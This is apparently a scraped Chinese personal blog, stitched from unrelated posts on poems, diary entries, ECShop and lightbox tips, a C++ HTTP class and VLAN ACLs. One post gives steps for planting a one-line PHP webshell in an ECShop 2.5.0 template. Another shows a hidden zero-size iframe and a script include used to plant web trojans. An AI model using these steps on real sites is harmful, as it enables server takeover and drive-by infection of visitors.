街口
有一首诗是这样的: 😈
我坐在路边
司机在转弯
我不喜欢我来的地方
我也不喜欢我要去的地方
为什么我如此的不安
看着司机转弯
耕耘内心 自求沉静……..)
有一首诗是这样的: 😈
我坐在路边
司机在转弯
我不喜欢我来的地方
我也不喜欢我要去的地方
为什么我如此的不安
看着司机转弯
耕耘内心 自求沉静……..)
本周乐卡:1.巴黎铁塔 2.游叶 3.暗恋桃花源 4.外白渡桥
[singlepic id=73 w=320 h=240 mode=web20 ]
外白渡桥
阅读全文…
# 😆 Ti:有同学说这个很老了,去年十月国内就有人发过了,看了下,的确是,地址在这里。虽然是老的,但是以前没发过,所以也就不删了,留在这里存档吧。
PS:进去后 在“模板管理”-》“库项目管理”,然后选择myship.lbi,在模板里面随便插入一句话小马,在连接http://www.target.com/myship.php文件就可以了,ECshop的smarty模板机制是允许直接执行php代码。
######################### Securitylab.ir ########################
# Application Info:
# Name: ECSHOP
# Version: 2.5.0
# Website: http://www.ecshop.com
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
商城系统批量上传一般用CSV,最近研究了在Ecshop下图片批量实现方法。
图片指的优点是容易操作,图形界面,对新手很友好,缺点是没有CSV那样灵活。
[singlepic id=76 w=320 h=240 mode=web20 ]
网页挂马的形式多种多样,主要是通过利用IE漏洞进行传播,网页被挂马是服务器安全中最重要的一环。挂马并不是仅仅将恶意代码写入正常网页这么简单,因为对于挂马者来说,希望网页木马的生存时间能尽可能地长,按照现在的黑客产业链的黑市价格,在一个大型社区网站挂一个小时的网页木马就需要几千元人民币,所以为了躲避管理员的检查,挂马的黑客们绞尽脑汁,网页木马的隐藏技术也因此得到了极大的发展,大致有以下几种。
(1)在页面插入一个隐藏的框架:在网页中插入一段如下的HTML代码:<iframe src=http://网页木马地址width=0 height=0></iframe>,其中width和height属性为0意味着该框架是不可见的,受害者若不查看源代码很难发现网页木马。这个方法也是挂马最常用的一段代码,但是随着网站管理员和广大网民安全意识的提高,只要在源代码中搜索iframe这个关键字,就很容易找到网页木马的源头。
(2)利用JavaScript引入网页木马:相比iframe这个标签,<SCRIPT src=”http://xx.js” type=text/javascript>这段代码就显得更加隐蔽,因为几乎95%的网页中都会出现类似的script 标签,利用js引入网页木马也有多种方法:
在做okitems.com时,客户要求在商品页面添加放大镜效果,开始以为套上lightbox就行,后面在这上面还是出了点问题.
1. 开始把lightbox的js放在head中,由于页面加载是按顺序加载,先加载js,导致不能正确识别到后面的标签,把js 改放在</body>前。
2. Ecshop的common.js和lightbox 2.4的prototype.js冲突,使ecshop的一些js调用失败.最后只能换个没带prototype.js的版本。
下面的来自 http://www.huddletogether.com/projects/lightbox2/ 2.4的lightbox可以从这边下。
纯C++的Socket访问Http封装类
|
1.项目中要使用c++++来访问Web服务器,从网上找了个C++的封装类,其中调用了MFC,在VC2005上用能用,但是移植到VC2003就出问题了,干脆修改成了纯C++的,不敢独享,share之。 2.以下是调用方法: |
直接上代码了,blog附件上传貌似有点问题,
今天很失败,第一次给这么彻底否定
VI递来一支烟,没感觉的抽完它
小贱人说我哪个都想要,最后都没有
其实哪个都不想要 不知道为什么会变成现在这样
0、1 。。。。以后什么都没了
外婆病了,看起来好瘦
听ST上面的Future,前面是一堆的试卷,说好只负责出题,最后回来发现这些试卷又压回桌上。
题目出的有些变态,不过每张都写的满满的,很意外。。。估计看完这些头要大了,唐僧这次用的上了。
星爷 那个只知道蹭饭的 给骗过去监考,至今还蒙在鼓里。
第一次看 猫 考试,很认真的样子 感觉很好 说不清为什么想她来到这边。
看她Q的头像,找不上话题 S说这是心理作用 淡定。。。
婷今天没来,可能早猜到了。。。复杂的女人
NP收宫,没上56cto发战报,对那些战友深深忏悔下
在学校没多少日子,下面要准备跑路了
明德楼这边地形比下安好,安静+有自己空间 累了还可以看城市画报
外婆病了,一个给了我童年的老人 明天要去看她
最近碰到如何实现VLAN之间的访问控制,一般在三层交换机上直接把ACL应用到相应VLAN的虚端口就OK了,其实我自己也没有机会去真正实践过。眼下正巧有个项目涉及到这方面的需求,于是对如何实现VLAN之间的访问控制仔细研究了一番,这才发现VLAN访问控制列表(VACL)和VLAN之间的访问控制列表其实在实现方式上是有很大不同的,虽然从字面上看两者差不多。
常说的VLAN之间的访问控制,它的实现方式是将ACL直接应用到VLAN的虚端口上,与应用到物理端口的ACL实现方式是一样的。而VLAN访问控制(VACL),也称为VLAN访问映射表,它的实现方式与前者完全不同。它应用于VLAN中的所有通信流,支持基于ETHERTYPE和MAC地址的过滤,可以防止未经授权的数据流进入VLAN.目前支持的VACL操作有三种:转发(forward),丢弃(drop),重定向(redirect)。